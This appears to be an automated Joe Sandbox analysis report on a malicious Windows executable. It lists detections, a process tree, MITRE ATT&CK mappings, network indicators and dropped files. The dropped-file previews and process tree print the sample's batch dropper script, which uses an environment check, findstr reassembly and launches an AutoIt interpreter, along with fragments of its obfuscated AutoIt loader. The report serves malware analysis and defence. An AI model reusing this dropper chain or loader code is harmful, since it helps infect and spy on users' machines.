ID: 439538 Sample Name: As47eCZnpZ Cookbook: default.jbs Time: 05:55:27 Date: 24/06/2021 Version: 32.0.0 Black Diamond

Copyright Joe Security LLC 2021

Table of Contents

Windows Analysis Report As47eCZnpZ
  Overview
    General Information
    Detection
    Signatures
    Classification
    Process Tree
    Malware Configuration
    Yara Overview
    Sigma Overview
    Signature Overview
      AV Detection
      Networking
      Key, Mouse, Clipboard, Microphone and Screen Capturing
      System Summary
      Data Obfuscation
      Malware Analysis System Evasion
      HIPS / PFW / Operating System Protection Evasion
    Mitre Att&ck Matrix
    Behavior Graph
    Screenshots
      Thumbnails
    Antivirus, Machine Learning and Genetic Malware Detection
      Initial Sample
      Dropped Files
      Unpacked PE Files
      Domains
      URLs
    Domains and IPs
      Contacted Domains
      URLs from Memory and Binaries
      Contacted IPs
        Public
        Private
    General Information
    Simulations
      Behavior and APIs
    Joe Sandbox View / Context
      IPs
      Domains
      ASN
      JA3 Fingerprints
      Dropped Files
    Created / dropped Files
    Static File Info
      General
      File Icon
      Static PE Info
        General
        Entrypoint Preview
        Data Directories
        Sections
        Resources
        Imports
        Version Infos
        Possible Origin
    Network Behavior
      Network Port Distribution
      TCP Packets
      UDP Packets
      DNS Queries
      DNS Answers
    Code Manipulations
    Statistics
    Behavior
      System Behavior
        Analysis Process: As47eCZnpZ.exe PID: 6216 Parent PID: 5912 (General; File Activities: File Created, File Deleted, File Written, File Read)
        Analysis Process: cmd.exe PID: 6424 Parent PID: 6216 (General; File Activities)
        Analysis Process: conhost.exe PID: 6464 Parent PID: 6424 (General)
        Analysis Process: cmd.exe PID: 6516 Parent PID: 6424 (General; File Activities: File Created, File Written, File Read)
        Analysis Process: findstr.exe PID: 6532 Parent PID: 6516 (General; File Activities: File Written)
        Analysis Process: Bel.exe.com PID: 6552 Parent PID: 6516 (General; File Activities: File Read)
        Analysis Process: PING.EXE PID: 6564 Parent PID: 6516 (General; File Activities)
        Analysis Process: Bel.exe.com PID: 6600 Parent PID: 6552 (General; File Activities: File Deleted, File Read)
        Analysis Process: nslookup.exe PID: 4532 Parent PID: 6600 (General; Registry Activities: Key Created, Key Value Created)
    Disassembly
      Code Analysis

Windows Analysis Report As47eCZnpZ

Overview

General Information

Sample Name: As47eCZnpZ (renamed file extension from none to exe)
Analysis ID: 439538
MD5: 93df98db8236868…
SHA1: b42499efc5cad69…
SHA256: ad09d1a6e737f29…
Tags: 32 exe
Infos:
Most interesting Screenshot:

Detection

Detection: malicious (scale: clean / suspicious / malicious)
Score: 80
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Multi AV Scanner detection for submitted file
Machine Learning detection for sample
Contains functionality to register a low level keyboard hook
Injects a PE file into a foreign processes
Submitted sample is a known malware sample
Obfuscated command line found
Uses nslookup.exe to query domains
Uses ping.exe to check the status of other devices and networks
Uses ping.exe to sleep
Writes to foreign memory regions
Abnormal high CPU Usage
Contains functionality to check if a d…
Contains functionality to check if a d…
Contains functionality to check if a w…
Contains functionality to dynamically…
Contains functionality to query locale…
Contains functionality to retrieve info…
Contains functionality to simulate ke…
Creates a process in suspended mo…
Detected TCP or UDP traffic on non…
Detected potential crypto function
Found potential string decryption / a…
IP address seen in connection with o…
Monitors certain registry keys / valu…
PE file contains an invalid checksum
PE file contains strange resources
Potential key logger detected (keys…
Sample execution stops while proces…
Sample file is different than original …
Tries to resolve domain names, but …
Uses 32bit PE files
Uses code obfuscation techniques (…

Classification

[Classification radar figure; only its labels are recoverable. Axes: Ransomware, Miner, Spreading, Evader, Phishing, Exploiter, Banker, Spyware, Trojan / Bot, Adware. Scale labels: malicious, suspicious, clean.]

Process Tree

System is w10x64
As47eCZnpZ.exe (PID: 6216 cmdline: 'C:\Users\user\Desktop\As47eCZnpZ.exe' MD5: 93DF98DB8236868F5BD80EC14FE33A6C)
  cmd.exe (PID: 6424 cmdline: 'C:\Windows\System32\cmd.exe' /c cmd < Profonda.m4a MD5: F3BDBE3BB6F734E357235F4D5898582D)
    conhost.exe (PID: 6464 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
    cmd.exe (PID: 6516 cmdline: cmd MD5: F3BDBE3BB6F734E357235F4D5898582D)
      findstr.exe (PID: 6532 cmdline: findstr /V /R '^ZHdrmMsYFJiRDNmGpRonwXdHHcnPYBUAWuOMQZMASfNOcQYMlNcHCFhwsJvrhBqrOHUvZMPlyIGLlBkQvMElyhYdTMciCIjdfJZ$' Folle.m4a MD5: 8B534A7FC0630DE41BB1F98C882C19EC)
      Bel.exe.com (PID: 6552 cmdline: Bel.exe.com R MD5: C56B5F0201A3B3DE53E561FE76912BFD)
        Bel.exe.com (PID: 6600 cmdline: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\Bel.exe.com R MD5: C56B5F0201A3B3DE53E561FE76912BFD)
          nslookup.exe (PID: 4532 cmdline: C:\Windows\SysWOW64\nslookup.exe MD5: 8E82529D1475D67615ADCB4E1B8F4EEC)
      PING.EXE (PID: 6564 cmdline: ping 127.0.0.1 -n 30 MD5: 70C24A306F768936563ABDADB9CA9108)
cleanup

Malware Configuration

No configs have been found

Yara Overview

No yara matches

Sigma Overview

No Sigma rule has matched

Signature Overview


AV Detection:

Multi AV Scanner detection for submitted file

Machine Learning detection for sample

Networking:

Uses nslookup.exe to query domains

Uses ping.exe to check the status of other devices and networks

Key, Mouse, Clipboard, Microphone and Screen Capturing:

Contains functionality to register a low level keyboard hook

System Summary:

Submitted sample is a known malware sample

Data Obfuscation:

Obfuscated line found

Malware Analysis System Evasion:

Uses ping.exe to sleep

HIPS / PFW / Operating System Protection Evasion:

Injects a PE file into a foreign processes

Writes to foreign memory regions

Mitre Att&ck Matrix

Columns: Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Exfiltration | Command and Control | Network Effects

Valid Accounts | Command and Scripting Interpreter 1 | Path Interception | Process Injection 2 1 2 | Process Injection 2 1 2 | Input Capture 1 2 1 | … Discovery 1 | Remote Services | Input Capture 1 2 1 | Exfiltration Over Other Network Medium | Encrypted Channel 1 | Eavesdrop on Insecure Network Communication
Default Accounts | Native API 1 | Boot or Logon Initialization Scripts | Boot or Logon Initialization Scripts | Deobfuscate/Decode Files or Information 1 1 | LSASS Memory | Query Registry 1 | Remote Desktop Protocol | Archive Collected Data 1 | Exfiltration Over Bluetooth | Non-Standard Port 1 | Exploit SS7 to Redirect Phone Calls/SMS
Domain Accounts | … (Linux) | Logon Script (Windows) | Logon Script (Windows) | Obfuscated Files or Information 2 | Security Account Manager | Security Software Discovery 2 1 | SMB/Windows Admin Shares | Data from Network Shared Drive | Automated Exfiltration | Non-Application Layer Protocol 1 | Exploit SS7 to Track Device Location
Local Accounts | At (Windows) | Logon Script (Mac) | Logon Script (Mac) | Binary Padding | NTDS | Process Discovery 2 | Distributed Component Object Model | Input Capture | Scheduled Transfer | Application Layer Protocol 1 | SIM Card Swap
Cloud Accounts | Cron | Network Logon Script | Network Logon Script | Software Packing | LSA Secrets | Application Window Discovery 1 | SSH | Keylogging | Data Transfer Size Limits | Fallback Channels | Manipulate Device Communication
Replication Through Removable Media | Launchd | Rc.common | Rc.common | Steganography | Cached Domain Credentials | Remote System Discovery 1 1 | VNC | GUI Input Capture | Exfiltration Over C2 Channel | Multiband Communication | Jamming or Denial of Service
External Remote Services | Scheduled Task | Startup Items | Startup Items | Compile After Delivery | DCSync | System Network Configuration Discovery 2 | Windows Remote Management | Web Portal Capture | Exfiltration Over Alternative Protocol | Commonly Used Port | Rogue Wi-Fi Access Points
Drive-by Compromise | Command and Scripting Interpreter | Scheduled Task/Job | Scheduled Task/Job | Indicator Removal from Tools | Proc Filesystem | File and Directory Discovery 2 | Shared Webroot | Credential API Hooking | Exfiltration Over Symmetric Encrypted Non-C2 Protocol | Application Layer Protocol | Downgrade to Insecure Protocols
Exploit Public-Facing Application | PowerShell | At (Linux) | At (Linux) | Masquerading | /etc/passwd and /etc/shadow | System Information Discovery 1 4 | Software Deployment Tools | Data Staged | Exfiltration Over Asymmetric Encrypted Non-C2 Protocol | Web Protocols | Rogue Cellular Base Station

Behavior Graph

[Behavior graph figure; only its text is recoverable. ID: 439538, Sample: As47eCZnpZ, Startdate: 24/06/2021, Architecture: WINDOWS, Score: 80. Process nodes: As47eCZnpZ.exe, cmd.exe, conhost.exe, cmd.exe, Bel.exe.com, PING.EXE, findstr.exe, Bel.exe.com, nslookup.exe. Dropped file: C:\Users\user\AppData\Local\...\Bel.exe.com (Targa). DNS name: PXBJECjdIHvvfvACvVUZukUKtdaV.PXBJECjdIHvvfvACvVUZukUKtdaV (unknown). Addresses: 127.0.0.1, 192.168.2.1, 176.111.174.74 (ports 4173, 49719; WILWAWPL, Russian Federation). Signatures shown on the graph: Multi AV Scanner detection for submitted file; Machine Learning detection for sample; Contains functionality to register a low level keyboard hook; Submitted sample is a known malware sample; Obfuscated command line found; Uses ping.exe to check the status of other devices and networks; Uses ping.exe to sleep; Uses nslookup.exe to query domains; Writes to foreign memory regions; Injects a PE file into a foreign processes. Legend: Process, Signature, Created File, DNS/IP Info, Is Dropped, Is Windows Process, Number of created Registry Values, Number of created Files, Visual Basic, Delphi, Java, .Net C# or VB.NET, C, C++ or other language, Is malicious, Internet.]

Screenshots

Thumbnails

This section contains all screenshots as thumbnails, including those not shown in the slideshow.

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Source | Detection | Scanner | Link
As47eCZnpZ.exe | 13% | Virustotal | Browse
As47eCZnpZ.exe | 41% | ReversingLabs | Win32.Trojan.Crypzip
As47eCZnpZ.exe | 100% | Joe Sandbox ML |

Dropped Files

No Antivirus matches

Unpacked PE Files

No Antivirus matches

Domains

No Antivirus matches

URLs

No Antivirus matches

Domains and IPs

Contacted Domains

Name | IP | Active | Malicious | Antivirus Detection | Reputation
PXBJECjdIHvvfvACvVUZukUKtdaV.PXBJECjdIHvvfvACvVUZukUKtdaV | unknown | unknown | false | | unknown

URLs from Memory and Binaries

Contacted IPs

Public

IP | Domain | Country | Flag | ASN | ASN Name | Malicious
176.111.174.74 | unknown | Russian Federation | | 201305 | WILWAWPL | false

Private

IP
192.168.2.1
127.0.0.1

General Information

Joe Sandbox Version: 32.0.0 Black Diamond
Analysis ID: 439538
Start date: 24.06.2021
Start time: 05:55:27
Joe Sandbox Product: CloudBasic
Overall analysis duration: 0h 7m 41s
Hypervisor based Inspection enabled: false
Report type: light
Sample file name: As47eCZnpZ (renamed file extension from none to exe)
Cookbook file name: default.jbs
Analysis system description: Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
Number of analysed new started processes analysed: 24
Number of new started drivers analysed: 0
Number of existing processes analysed: 0
Number of existing drivers analysed: 0
Number of injected processes analysed: 0
Technologies: HCA enabled, EGA enabled, HDC enabled, AMSI enabled
Analysis Mode: default
Analysis stop reason:
Detection: MAL
Classification: mal80.troj.spyw.evad.winEXE@16/7@1/3
EGA Information: Failed
HDC Information: Successful, ratio: 59% (good quality ratio 57.8%); Quality average: 89.2%; Quality standard deviation: 19.4%
HCA Information: Failed
Cookbook Comments: Adjust boot time; Enable AMSI
Warnings:

Simulations

Behavior and APIs

Time | Type | Description
05:56:31 | API Interceptor | 1x Sleep call for process: Bel.exe.com modified

Joe Sandbox View / Context

IPs

Match | Associated Sample Name / URL | SHA 256 | Detection | Link | Context
176.111.174.74 | vMGwWrPRdu.exe | Get hash | malicious | Browse | 176.111.174.74/$.exe
176.111.174.74 | 0Zru1SwgUv.exe | Get hash | malicious | Browse | 176.111.174.74/Kill$.exe
176.111.174.74 | MkN1YeVTbG.exe | Get hash | malicious | Browse | 176.111.174.74/Kill$.exe
176.111.174.74 | ldnaZ1RI6W.exe | Get hash | malicious | Browse | 176.111.174.74/Kill$.exe
176.111.174.74 | MNV60DaSww.exe | Get hash | malicious | Browse | 176.111.174.74/Kill$.exe
176.111.174.74 | UR8zlHNhnw.exe | Get hash | malicious | Browse | 176.111.174.74/Kill$.exe

Domains

No context

ASN

Match | Associated Sample Name / URL | SHA 256 | Detection | Link | Context
WILWAWPL | dUHf4W45fC.exe | Get hash | malicious | Browse | 176.111.174.107
WILWAWPL | vMGwWrPRdu.exe | Get hash | malicious | Browse | 176.111.174.74
WILWAWPL | djzqkrJmZC.exe | Get hash | malicious | Browse | 176.111.174.107
WILWAWPL | gknZtppOC6.exe | Get hash | malicious | Browse | 176.111.174.254
WILWAWPL | SeBVPZSYbF.exe | Get hash | malicious | Browse | 176.111.174.254
WILWAWPL | TFPxQL6uLU.exe | Get hash | malicious | Browse | 176.111.174.254
WILWAWPL | xuIDpVhTW8.exe | Get hash | malicious | Browse | 176.111.174.254
WILWAWPL | ALFl44K1Kg.exe | Get hash | malicious | Browse | 176.111.174.254
WILWAWPL | vQu9RlgOox.exe | Get hash | malicious | Browse | 176.111.174.254
WILWAWPL | XO1uYL6AQd.exe | Get hash | malicious | Browse | 176.111.174.254
WILWAWPL | 0EG8l0QFdv.exe | Get hash | malicious | Browse | 176.111.174.89
WILWAWPL | daq2qi3r2X.exe | Get hash | malicious | Browse | 176.111.174.254
WILWAWPL | Op3ra80cp6.exe | Get hash | malicious | Browse | 176.111.174.40
WILWAWPL | qY7H2JjWbU.exe | Get hash | malicious | Browse | 176.111.174.254
WILWAWPL | 41PP9MnS6t.exe | Get hash | malicious | Browse | 176.111.174.254
WILWAWPL | bb4Wdn72fp.exe | Get hash | malicious | Browse | 176.111.174.254
WILWAWPL | FGdFl4G7Bf.exe | Get hash | malicious | Browse | 176.111.174.254
WILWAWPL | 7DfK6MCFiI.exe | Get hash | malicious | Browse | 176.111.174.254
WILWAWPL | V0DNOQ8w1q.exe | Get hash | malicious | Browse | 176.111.174.254
WILWAWPL | 2aWJvuHmxd.exe | Get hash | malicious | Browse | 176.111.174.254

JA3 Fingerprints

No context

Dropped Files

No context

Created / dropped Files

C:\Users\user\AppData\Local\Temp\7ZipSfx.000\Bel.exe.com

Process: C:\Windows\SysWOW64\findstr.exe
File Type: Targa image data - Mono 65536 x 184 x 0 +65535 ""
Category: modified
Size (bytes): 893606
Entropy (8bit): 6.6201269982958335
Encrypted: false
SSDEEP: 12288:5pVWeOV7GtINsegA/hMyyzlcqikvAfcN9b2MyZa31twoPTdFxgawV2M01:5T3E53Myyzl0hMf1tr7Caw8M01
MD5: AC7E48DBA858E15A8E690D815932BB19
SHA1: BE87503D572E71FD3D66D0F9DDAD4F2CE00C1FE1
SHA-256: FB037A9D6DE82C0CD301AEEAD155EEC3127282752E1F647A5DCDD156A685E6C2
SHA-512: FCF848846A530CB6E60D79E49B51DADFD31C120E9F23DE6D89A6D9FC0CC38F29F0410E25A5F29BE5722B0BCDE15210B057D9D41E7928A3612EB53F16B7DFB00B
Malicious: true
Reputation: moderate, very likely benign file
Preview: ...... @...... !..L.!This program cannot be run in DOS mode....$...... sD.R.*.R.*.R.*..C..P.*....S.*[email protected].*._@....*[email protected].*.[j..[.*.[j..w.*.R.+ .r.*...... *....S.*[email protected].*.R...P.*....S.*.RichR.*...... PE..L....q.Z...... "...... @...... @...@...... @...... |...... P...... p...q...;...... [..@...... text...... `.rdata...... @[email protected]...... R...... @....rsrc...P...... <...... @[email protected]...... @..B......

C:\Users\user\AppData\Local\Temp\7ZipSfx.000\Folle.m4a

Process: C:\Users\user\Desktop\As47eCZnpZ.exe
File Type: data
Category: dropped
Size (bytes): 893707
Entropy (8bit): 6.620332197564393
Encrypted: false
SSDEEP: 12288:IpVWeOV7GtINsegA/hMyyzlcqikvAfcN9b2MyZa31twoPTdFxgawV2M01:IT3E53Myyzl0hMf1tr7Caw8M01
MD5: 62D36624C2AC3F6FB66BE6E1996DD007
SHA1: 05A99E128D9DDB52CF2941D63BEFAF9E49FFBD1C
SHA-256: CBD4FDFAF795CE48124ABB0D444D939546AED39B342765203E22A60F3105BE7D
SHA-512: 7161444B74D0A7193EA2B671CF08B978C1F8EFEAB7F76C30D8A08A93796625F08B0E181EF37451570A67EF30970A3863BBFA9B3A1D7B09175AD1E37DCB9C1970
Malicious: false
Reputation: low
Preview: ZHdrmMsYFJiRDNmGpRonwXdHHcnPYBUAWuOMQZMASfNOcQYMlNcHCFhwsJvrhBqrOHUvZMPlyIGLlBkQvMElyhYdTMciCIjdfJZ...... @...... !..L.!This program cannot be run in DOS mode....$...... sD.R.*.R.*.R.*..C..P.*....S.*[email protected].*._@....*[email protected].*.[j..[.*.[j..w.*.R.+.r.*...... *....S.*[email protected].*.R...P.*....S .*.RichR.*...... PE..L....q.Z...... "...... @...... @...@...... @...... |...... P...... p...q...;...... [..@ ...... text...... `.rdata...... @[email protected]...... R...... @....rsrc...P...... <...... @[email protected]...... @..B......

C:\Users\user\AppData\Local\Temp\7ZipSfx.000\Profonda.m4a

Process: C:\Users\user\Desktop\As47eCZnpZ.exe
File Type: ASCII text, with CRLF line terminators
Category: dropped
Size (bytes): 281
Entropy (8bit): 5.72441813736028
Encrypted: false
SSDEEP: 6:CS5IX/jHilqw+Bi39Drqj5cclUnE1Jo/2PlFAkY7loNQXSLp0n:zWXrZw339DrqNcMgcJoePDAkY7lGCS90
MD5: 85D3AE083D0C78B133F784CCBB908F49
SHA1: 0F904C97992551BE5634D36C49CB8CE91827FC9E
SHA-256: 1E56025E8F519E3D6AD524D1F2D7FC05B67CC3A63B59C67AFB23CEF8719BE1B2
SHA-512: ED73C4EA577B65E229D2E7E5880D4EFAD180EC0D1D5D0273E43D864739DEBE249FF1FF4E3614D961C5F71A6AB35C374F94B8983BF71216EC4BFF02AEB6D1F892
Malicious: false
Reputation: low
Preview: if %userdomain%==DESKTOP-QO5QU33 1.. Bel.exe.com..findstr /V /R "^ZHdrmMsYFJiRDNmGpRonwXdHHcnPYBUAWuOMQZMASfNOcQYMlNcHCFhwsJvrhBqrOHUvZMPlyIGLlBkQvMElyhYdTMciCIjdfJZ$" Folle.m4a >> Bel.exe.com"..copy Puo.m4a R..start Bel.exe.com R..ping 127.0.0.1 -n 30....

C:\Users\user\AppData\Local\Temp\7ZipSfx.000\Puo.m4a

Process: C:\Users\user\Desktop\As47eCZnpZ.exe
File Type: ASCII text, with very long lines, with CRLF, CR, LF line terminators
Category: dropped
Size (bytes): 975982
Entropy (8bit): 5.854319450048129
Encrypted: false
SSDEEP: 6144:ip1S9JLZg66YHZ2eABYnEd0a2dVDMvfdydEAgG73GgZ0kmIGdWsNxnKEAXn/vu9t:W1SO6vtrdMmESmddpnHK/4iS7uCVmD0
MD5: 3920574F20EAC0217736519819A577A4
SHA1: 1C022C97B11007C00481A43C805C0E250C1F6318
SHA-256: 7611F2A46A893A9EE77B484EF7635C99F8E06AE5D235627A731FD9DBA7F3093C
SHA-512: 846CBB13A922104BE08580BDF48B5DAE031C6FD8B20B4BD5C14364B7F4B1FCF539F1EEFB3B5D67E565CE23B46C09DD8910573C9540C30EB826B4965F7EFC0541
Malicious: false
Reputation: low
Preview: ..Func FMHdbmYg($uVZ,$ppFfv,$KvtlIJ)..Local $JyoLEhlbigGfOndsWilHaPSHfcoIbHNKrfbwNgBrZMnwPtWXNTLCEhGUjB = 'otBZmAWknwfEIGiHGdRRlmkVEWlyPJCPkSaYbMYASSbWbgrWbFqDcJkJTGcDdRvPnmaPholTadYswgbfSgIpJYzCHIyQdclwvIbYWgIgcukyKTIEpuKwpjumyPiErzDWyXVzRmzEFzOCNgROqAHlKpSpCXSuutkwDgZNXgMKNucPnDMRYzDCMzjW'...$wkhcFUlEtyI = 150..$ZByMiQdFqFPZBz = 81..While ((6602-6601)*6149)..Switch $wkhcFUlEtyI..Case 1 42....$gRcbwdlytuinkyjX = Execute(xhpJVaRnwfIaM("87_120_118_109_114_107_77_119_74_112_115_101_120_44_43_89_75_69_88_122_102_117_88_107_79_119_109_43_45",4)), $dSSXCUZqvPqRNG = 'LCEvpRyOexhVsaGERQtLJJLrRsKbQmeIQeoMuUYiktQDfYHI'..$175 = 138..For $nSaclIGFaQXUTXIWkKJJgyAumVmHBdgckhjskstpPRImhkkomBZcCgKask = 4 To 23..Local $JUgeQAFRiHXCa = 'tgpTnXSWmESoOSJeIFdwZVOuWFgiqDuglKUznVNkoMcJpIMNitZak'..Local $gRcbwdlytuinkyjX = Execute(xhpJVaRnwfIaM("92_125_123_114_119_112_82_124_79_117_120_106_125_49_48_120_118_123_97_92_82_85_95_96_119_78_97_48_50",9)), $YdDMSyTh = 'yWgSBZWDOeUyLTcYUDbQmkFKIPRAhm'..Next....$wkhc

C:\Users\user\AppData\Local\Temp\7ZipSfx.000\R

Process: C:\Windows\SysWOW64\cmd.exe
File Type: ASCII text, with very long lines, with CRLF, CR, LF line terminators
Category: dropped
Size (bytes): 975982
Entropy (8bit): 5.854319450048129
Encrypted: false
SSDEEP: 6144:ip1S9JLZg66YHZ2eABYnEd0a2dVDMvfdydEAgG73GgZ0kmIGdWsNxnKEAXn/vu9t:W1SO6vtrdMmESmddpnHK/4iS7uCVmD0
MD5: 3920574F20EAC0217736519819A577A4
SHA1: 1C022C97B11007C00481A43C805C0E250C1F6318
SHA-256: 7611F2A46A893A9EE77B484EF7635C99F8E06AE5D235627A731FD9DBA7F3093C
SHA-512: 846CBB13A922104BE08580BDF48B5DAE031C6FD8B20B4BD5C14364B7F4B1FCF539F1EEFB3B5D67E565CE23B46C09DD8910573C9540C30EB826B4965F7EFC0541
Malicious: false
Reputation: low
Preview: ..Func FMHdbmYg($uVZ,$ppFfv,$KvtlIJ)..Local $JyoLEhlbigGfOndsWilHaPSHfcoIbHNKrfbwNgBrZMnwPtWXNTLCEhGUjB = 'otBZmAWknwfEIGiHGdRRlmkVEWlyPJCPkSaYbMYASSbWbgrWbFqDcJkJTGcDdRvPnmaPholTadYswgbfSgIpJYzCHIyQdclwvIbYWgIgcukyKTIEpuKwpjumyPiErzDWyXVzRmzEFzOCNgROqAHlKpSpCXSuutkwDgZNXgMKNucPnDMRYzDCMzjW'...$wkhcFUlEtyI = 150..$ZByMiQdFqFPZBz = 81..While ((6602-6601)*6149)..Switch $wkhcFUlEtyI..Case 1 42....$gRcbwdlytuinkyjX = Execute(xhpJVaRnwfIaM("87_120_118_109_114_107_77_119_74_112_115_101_120_44_43_89_75_69_88_122_102_117_88_107_79_119_109_43_45",4)), $dSSXCUZqvPqRNG = 'LCEvpRyOexhVsaGERQtLJJLrRsKbQmeIQeoMuUYiktQDfYHI'..$175 = 138..For $nSaclIGFaQXUTXIWkKJJgyAumVmHBdgckhjskstpPRImhkkomBZcCgKask = 4 To 23..Local $JUgeQAFRiHXCa = 'tgpTnXSWmESoOSJeIFdwZVOuWFgiqDuglKUznVNkoMcJpIMNitZak'..Local $gRcbwdlytuinkyjX = Execute(xhpJVaRnwfIaM("92_125_123_114_119_112_82_124_79_117_120_106_125_49_48_120_118_123_97_92_82_85_95_96_119_78_97_48_50",9)), $YdDMSyTh = 'yWgSBZWDOeUyLTcYUDbQmkFKIPRAhm'..Next....$wkhc

C:\Users\user\AppData\Local\Temp\7ZipSfx.000\Sfaldavano.m4a

Process: C:\Users\user\Desktop\As47eCZnpZ.exe
File Type: data
Category: dropped
Size (bytes): 212992
Entropy (8bit): 7.999103891298141
Encrypted: true
SSDEEP: 6144:7FnNA0Jy8tpv/G5phjDeRUbo+KUMyNiVt6NC1:7FN3pXG9jDeavN2tiC1
MD5: AD0CEE9C167ACAECFEE67E32C1E53A95
SHA1: 57C8C7FE1F1A75217F269BF00563E56E9DD694BE
SHA-256: 842764050803468DDBD46DF063AA2EE1952598406E3784CDCA57BAEBA21D6775
SHA-512: C3E88F8F89EF5258D9F49FB10342D6883788EA4322AA9B7AA43E619145E87259AEBE42E2D9E9F1A5A01D9729EDF6FF345BC74583EB62206E798DC7047B642634
Malicious: false
Preview: @6...*\...R...G..R.9.. ...'...... C...... 1..Jqa....[Y...Ob^.B.5 .{ .qG.*...."..../..4 Bu.a...,...T...s..t..$..m...*.b_#..I..MG...a<.y...&q...G....l...... Y.a.:.}N.F..'..'.]...s..&j.:.:$.....?.P...= .x....X.Uf.hm....G[..Y....z....K.Wh([email protected]...}c&n..q{u..[UY.(g.\.....C.:-..5....OJZt...... @.O..d.u.w.9....D.....c.....S){O...... !sm....*n.2.xz.Y...]...:. ..v.2...... \.J...?..f.Z...... *o0D.~..n.d;s.LB.)...... <6.~....w...ZhZ.VF.q..|..b..j.k.._..X..;i_{.F?.G.....1....A.`%..x%...U@.[... H?#..I8a.dR.{....E,G...-...[...... c...wx..|..w*..Q....Y v.IL.b..V!.....*.5Th;o.^.:..f5....'...F:".....J.3"dW:....<...g..I.A..7S.).i.7.(...<...r.....,#..u{hR.#.8.*.{..f4....L...... v..y...... =...*.. ...Xgi.T{q...U.U..*]~OA..]...T.K.;..V.!..L...... ua.N....w-..$ .....v..EL.L.. ...9...... 3[2...... *..>>...)-..].zW.B.w...0z3...Dw.}...... E..Lv..K).\.-.~..~C.T.G.6..N/|.....X/.[.m..|]G.+...4l.....Zu.c.].h...... [.y...U..."&..BK

Static File Info

General

File type: PE32 executable (GUI) Intel 80386, for MS Windows
Entropy (8bit): 7.671481217690432
TrID: Win32 Executable (generic) a (10002005/4) 99.96%; Generic Win/DOS Executable (2004/3) 0.02%; DOS Executable Generic (2002/1) 0.02%; Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
File name: As47eCZnpZ.exe
File size: 1521629
MD5: 93df98db8236868f5bd80ec14fe33a6c
SHA1: b42499efc5cad69836bfd85e226bc088d62f05fe
SHA256: ad09d1a6e737f2900eb85a8f92092d4c9065ba7b94902dc78ab900cbff166e82
SHA512: 1faf66b7eaeeb89ae18be3aae8641107b3c7f54a1fa0aa684bd9bc864143832ff3568d0cc4ebd45ebe026c7e9fc6134c2dda976d24ac69ce0814e2af615f6759
SSDEEP: 24576:JChmYDQDXULmCiIhekpMYVBgqrQyTIhBri4oNGxL2GbPo8P9XT:JbSQDb8/V4yklSGxL2sT9XT
File Content Preview: MZ`...... @...... `...... !..L.!Require Windows..$PE..L...... V...... `...... @...... p. .\......

File Icon

Icon Hash: f0ecd4d4d4dcd4d4

Static PE Info

General

Entrypoint: 0x41badf
Entrypoint Section: .text
Digitally signed: false
Imagebase: 0x400000
Subsystem: windows gui
Image File Characteristics: 32BIT_MACHINE, EXECUTABLE_IMAGE, RELOCS_STRIPPED
DLL Characteristics:
Time Stamp: 0x56B8EE06 [Mon Feb 8 19:35:34 2016 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major: 4
OS Version Minor: 0
File Version Major: 4
File Version Minor: 0
Subsystem Version Major: 4
Subsystem Version Minor: 0
Import Hash: 650ed02ca4b6baad6b24f20402b6268b

Entrypoint Preview

Data Directories

Sections

Name | Virtual Address | Virtual Size | Raw Size | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics
.text | 0x1000 | 0x1b48a | 0x1b600 | False | 0.60014447774 | data | 6.68441909824 | IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
.rdata | 0x1d000 | 0x4082 | 0x4200 | False | 0.453184185606 | data | 5.64476234082 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.data | 0x22000 | 0x4c30 | 0x800 | False | 0.427734375 | data | 3.84196672305 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_READ
.rsrc | 0x27000 | 0x6155c | 0x61600 | False | 0.384093689827 | data | 6.18503201203 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ

Resources

Imports

Version Infos

Possible Origin

Language of compilation system | Country where language is spoken | Map
English | United States |

Network Behavior

Network Port Distribution

TCP Packets

UDP Packets

DNS Queries

Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class
Jun 24, 2021 05:56:31.408637047 CEST | 192.168.2.5 | 8.8.8.8 | 0x35da | Standard query (0) | PXBJECjdIHvvfvACvVUZukUKtdaV.PXBJECjdIHvvfvACvVUZukUKtdaV | A (IP address) | IN (0x0001)

DNS Answers

Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class
Jun 24, 2021 05:56:31.463387012 CEST | 8.8.8.8 | 192.168.2.5 | 0x35da | Name error (3) | PXBJECjdIHvvfvACvVUZukUKtdaV.PXBJECjdIHvvfvACvVUZukUKtdaV | none | none | A (IP address) | IN (0x0001)

Code Manipulations

Statistics

Behavior


System Behavior

Analysis Process: As47eCZnpZ.exe PID: 6216 Parent PID: 5912

General

Start time: 05:56:21
Start date: 24/06/2021
Path: C:\Users\user\Desktop\As47eCZnpZ.exe
Wow64 process (32bit): true
Commandline: 'C:\Users\user\Desktop\As47eCZnpZ.exe'
Imagebase: 0x400000
File size: 1521629 bytes
MD5 hash: 93DF98DB8236868F5BD80EC14FE33A6C
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Reputation: low

File Activities

File Created

File Deleted

File Written

File Read

Analysis Process: cmd.exe PID: 6424 Parent PID: 6216

General

Start time: 05:56:27
Start date: 24/06/2021
Path: C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit): true
Commandline: 'C:\Windows\System32\cmd.exe' /c cmd < Profonda.m4a
Imagebase: 0x150000
File size: 232960 bytes
MD5 hash: F3BDBE3BB6F734E357235F4D5898582D
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Reputation: high

File Activities

Analysis Process: conhost.exe PID: 6464 Parent PID: 6424

General

Start time: 05:56:27
Start date: 24/06/2021
Path: C:\Windows\System32\conhost.exe
